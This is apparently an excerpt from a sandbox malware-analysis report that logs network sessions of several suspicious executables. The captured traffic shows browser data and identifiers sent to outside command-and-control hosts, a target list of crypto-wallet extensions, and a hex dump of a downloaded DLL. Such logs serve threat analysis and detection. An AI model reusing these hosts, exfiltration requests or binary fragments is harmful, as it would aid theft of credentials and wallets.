2024-04-04 15:49:15 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------IECFIEGDBKJKFIDHIECGCont
2024-04-04 15:49:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:16 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49753	104.21.65.24	443	3952	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:16 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-04 15:49:17 UTC	914	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 04 Apr 2024 15:49:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5CXsL0GG137xRibNK%2BQs5EzDkvyUQIJMFTQFTeHSYvxgPQ0FQDso%2BkpeXYwoBJvzHB%2B7mrkoHk6AGm5l3SRt%2B97uCoO12X7qXHlW7vmkbUi67shDSS1Jzygsn5F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f2728aeba3748e-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:17 UTC	455	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 33 39 62 39 36 39 66 38 33 62 33 63 31 39 61 38 33 64 64 39 65 39 36 63 63 38 30 38 36 39 31 39 39 39 36 39 30 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#f39b969f83b3c19a83dd9e96cc808691999690
2024-04-04 15:49:17 UTC	475	IN	Data Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 61 61 32 61 66 61 36 62 61 38 61 66 38 61 33 62 61 65 34 62 66 61 62 66 35 62 39 62 66 61 38 61 30 61 66 61 39 62 65 66 37 66 38 61 33 62 61 65 34 62 66 61 62 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#caa2afa6ba8af8a3bae4bfabf5b9bfa8a0afa9bef7f8a3bae4bfab
2024-04-04 15:49:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49754	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:16 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14013 Host: resergvearyinitiani.shop
2024-04-04 15:49:16 UTC	14013	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 35 37 46 46 39 32 44 38 31 41 30 33 30 30 33 42 46 33 37 30 33 33 46 39 46 36 35 45 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E7657FF92D81A03003BF37033F9F65E2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-04-04 15:49:17 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=laf48c452f02v3a1imsqoeepsk; expires=Mon, 29-Jul-2024 09:35:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyZSBlhZ5LaqxABMn%2FnjDmPEaGy%2BD9RwimHrmm0Z3gytLlqbT%2B5SSTiFba1m7M5F1FNG0YQgG5nbIKgZ9l8ai3Vk%2BNOx7Svzl1rDFSEPQEdPF6HdowijceJRciqyvoWUDDUpSS3qdR2ap9A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f2728a1df3da7f-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:17 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 0d 0a Data Ascii: 12ok 102.129.152.231
2024-04-04 15:49:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49756	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:17 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 6829 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:17 UTC	6829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------GIDHDGCBFBKECBFHCAFHContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------GIDHDGCBFBKECBFHCAFHContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------GIDHDGCBFBKECBFHCAFHCont
2024-04-04 15:49:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49758	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:17 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 16221 Host: resergvearyinitiani.shop
2024-04-04 15:49:17 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 35 37 46 46 39 32 44 38 31 41 30 33 30 30 33 42 46 33 37 30 33 33 46 39 46 36 35 45 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E7657FF92D81A03003BF37033F9F65E2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-04-04 15:49:17 UTC	890	OUT	Data Raw: 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 0f d2 4b b8 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00 00 14 00 08 08 Data Ascii: "leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPKK% WEdge/dp.txtPKA`Edge/Default/HistoryPK
2024-04-04 15:49:18 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t2ok9egm0ll26gpe033am4nv8b; expires=Mon, 29-Jul-2024 09:35:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=re21G2uU1o0inI95vQJCpg%2BTz9g0hQQn%2Fy0xVY59wxnNLHRNt8hvuOWA4R8lFMHulCWHAMMdHS%2FgcLRScWoZfpDQYKZHWuU6DjYprsZmd0Xdghu%2BI61bFR56D6kfUrNjzIl8VSvcFdgGFck%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f27292f8ec334d-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:18 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 0d 0a Data Ascii: 12ok 102.129.152.231
2024-04-04 15:49:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49760	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:18 UTC	241	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:19 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:19 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 01 Apr 2024 09:22:32 GMT Connection: close ETag: "660a7cd8-258600" Accept-Ranges: bytes
2024-04-04 15:49:19 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-04 15:49:19 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-04 15:49:19 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-04 15:49:20 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-04 15:49:20 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-04 15:49:20 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-04 15:49:20 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
